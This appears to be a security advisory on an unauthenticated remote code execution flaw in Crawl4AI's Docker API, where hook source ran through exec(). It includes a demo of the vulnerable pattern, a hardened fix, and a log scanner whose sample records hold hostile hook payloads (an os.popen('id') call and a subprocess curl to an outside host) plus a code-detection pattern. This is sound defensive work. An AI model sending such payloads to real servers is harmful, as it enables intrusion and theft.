Crawl4AI RCE: Hook, Line, and Sinker into Your Docker Container
Jan 17, 2026
Executive Summary (TL;DR)
Crawl4AI, a web scraper built for LLM pipelines, ships a Docker API whose unauthenticated `/crawl` endpoint accepted custom Python source in a `hooks` parameter. The server ran that source through `exec()` inside a restricted namespace that was meant to act as a sandbox, but the namespace still exposed `__import__`, so a hook could load `os` and run system commands. An attacker who can reach the API therefore sends one JSON payload and gets command execution as root inside the container, with the container's API keys and its network reachability as the immediate prize. Fixed in version 0.8.0.
A critical Remote Code Execution (RCE) vulnerability in Crawl4AI's Docker deployment lets unauthenticated attackers execute arbitrary Python code via the `hooks` parameter, bypassing a flimsy `exec()`-based sandbox.
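The pattern in the summary, modelled as an added example (not Crawl4AI's code: the function names, the builtin allow-list, the payload and the hook registry are assumptions made for the demonstration). The first function runs client-supplied hook source through `exec()` with a trimmed `__builtins__`, once with `__import__` left in and once with it removed; the second is the hardened shape, where the API only accepts the name of a server-defined hook.

```python
import os

# Added example modelling the CWE-95 pattern the advisory describes: untrusted
# hook source handed to exec() inside a trimmed __builtins__ namespace. This is
# not Crawl4AI's code; the function names, the builtin allow-list, the payload
# and the hook registry are assumptions made for the demonstration.


def run_hook_restricted(source: str, expose_import: bool) -> dict:
    """Vulnerable pattern: client-supplied source goes straight into exec().

    A cut-down __builtins__ looks like a sandbox. With expose_import=True the
    dictionary still carries __import__, which is the slip the advisory
    attributes to versions before 0.8.0; the hook can then load any module.
    """
    restricted_builtins = {"len": len, "str": str, "dict": dict}
    if expose_import:
        restricted_builtins["__import__"] = __import__
    namespace = {"__builtins__": restricted_builtins}
    exec(source, namespace)  # the dynamic-evaluation sink of CWE-95
    return namespace


# Constructed attacker payload. It never uses the 'import' keyword, so a naive
# keyword filter would wave it through; os.getpid() stands in for the
# os.system() / subprocess call a real attacker would make.
ATTACKER_HOOK = "result = __import__('os').getpid()"


def hook_reached_os(expose_import: bool) -> bool:
    """True when the payload escaped the restricted namespace and reached os."""
    try:
        namespace = run_hook_restricted(ATTACKER_HOOK, expose_import)
    except NameError:
        # __import__ is absent from __builtins__, so the name lookup fails.
        return False
    return namespace.get("result") == os.getpid()


# Hardened pattern: the API accepts the *name* of a server-defined hook, never
# its source. There is no dynamic evaluation left to escape from.
HOOK_REGISTRY = {
    "strip_whitespace": str.strip,
    "lowercase": str.lower,
}


def run_named_hook(hook_name: str, value: str) -> str:
    """Dispatch to an allow-listed hook; unknown names are rejected, not executed."""
    try:
        hook = HOOK_REGISTRY[hook_name]
    except KeyError:
        raise ValueError(f"unknown hook: {hook_name!r}") from None
    return hook(value)


if __name__ == "__main__":
    print("bypass with __import__ exposed:", hook_reached_os(True))
    print("bypass with __import__ removed: ", hook_reached_os(False))
    print("named hook:", run_named_hook("lowercase", "  Crawl4AI  "))
```

Removing `__import__` closes this one payload, but it does not make `exec()` of untrusted source safe: Python objects reachable from an empty namespace still expose their class hierarchy and module globals, so a determined attacker finds another route to `os`. The durable fix is the second shape above, where no client-supplied code is evaluated at all.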
Technical Appendix
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Crawl4AI (Open Source) | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Vulnerability Type | Remote Code Execution (RCE) |
| CWE ID | CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code) |
| CVSS Score | 10.0 (Critical) |
| Attack Vector | Network (API) |
| Authentication | None |
| Affected Component | Docker API / Hook Manager |
CWE-95 describes the flaw precisely: the product receives input from an upstream component but does not neutralize, or incorrectly neutralizes, code syntax before using the input in a dynamic evaluation call (e.g. `eval`; here `exec()` on the `hooks` parameter).
Known Exploits & Detection
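The request-level signal of this attack is a `POST /crawl` body whose `hooks` values contain Python rather than configuration. The scanner below is an added example, not part of the original advisory and not Crawl4AI code; it assumes a reverse proxy or API gateway that logs one JSON record per request with the parsed body, and the record layout, the hook names (`before_goto`, `after_goto`, `before_return_html`) and the request contents are all constructed for the demonstration.

```python
import json
import re

# Added detection example, not part of the original advisory and not Crawl4AI
# code. It assumes a reverse proxy or API gateway that logs one JSON record per
# request with the parsed body; the record layout, the hook names and the
# request contents below are constructed for the demonstration.

# Tokens that have no business in a scraper hook value. 'import' is matched as
# a whole word so that ordinary text such as "important" does not trigger.
CODE_INDICATORS = re.compile(
    r"__import__|\bimport\b|subprocess|os\.(?:system|popen)|\bexec\(|\beval\("
    r"|__subclasses__|__globals__"
)


def flag_hooks(record: dict) -> list[str]:
    """Return the names of hooks in a /crawl request whose values look like code.

    Only POST /crawl bodies with a 'hooks' object are inspected; anything else
    yields an empty list so the function can run over a whole access log.
    """
    if record.get("method") != "POST" or record.get("path") != "/crawl":
        return []
    body = record.get("body") or {}
    hooks = body.get("hooks")
    if not isinstance(hooks, dict):
        return []
    return [name for name, value in hooks.items()
            if isinstance(value, str) and CODE_INDICATORS.search(value)]


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Parse newline-delimited JSON records and return (timestamp, source IP,
    flagged hook names) for every request that carried code in a hook."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        flagged = flag_hooks(record)
        if flagged:
            findings.append((record["ts"], record["src"], flagged))
    return findings


# Constructed sample: two hostile requests, one benign crawl, one health check.
SAMPLE_RECORDS = [
    {"ts": "2026-01-17T10:00:01Z", "src": "203.0.113.7", "method": "POST", "path": "/crawl",
     "body": {"urls": ["https://example.com"],
              "hooks": {"before_goto": "result = __import__('os').popen('id').read()"}}},
    {"ts": "2026-01-17T10:00:04Z", "src": "203.0.113.7", "method": "POST", "path": "/crawl",
     "body": {"urls": ["https://example.com"],
              "hooks": {"after_goto": "import subprocess\nsubprocess.run(['curl', 'http://203.0.113.9/x'])",
                        "before_return_html": "page_title = 'unchanged'"}}},
    {"ts": "2026-01-17T10:01:12Z", "src": "198.51.100.4", "method": "POST", "path": "/crawl",
     "body": {"urls": ["https://example.org"]}},
    {"ts": "2026-01-17T10:01:15Z", "src": "198.51.100.4", "method": "GET", "path": "/health",
     "body": None},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in SAMPLE_RECORDS)


if __name__ == "__main__":
    for ts, src, hooks in scan_log(SAMPLE_LOG):
        print(f"{ts} {src} code-bearing hooks: {', '.join(hooks)}")
```

The token list is a heuristic for triage, not a control: an attacker who knows it is there can encode the payload, so the scan tells you which sources to investigate and which hosts to check for the 0.8.0 upgrade, while the actual fix is removing unauthenticated network exposure of the API and updating.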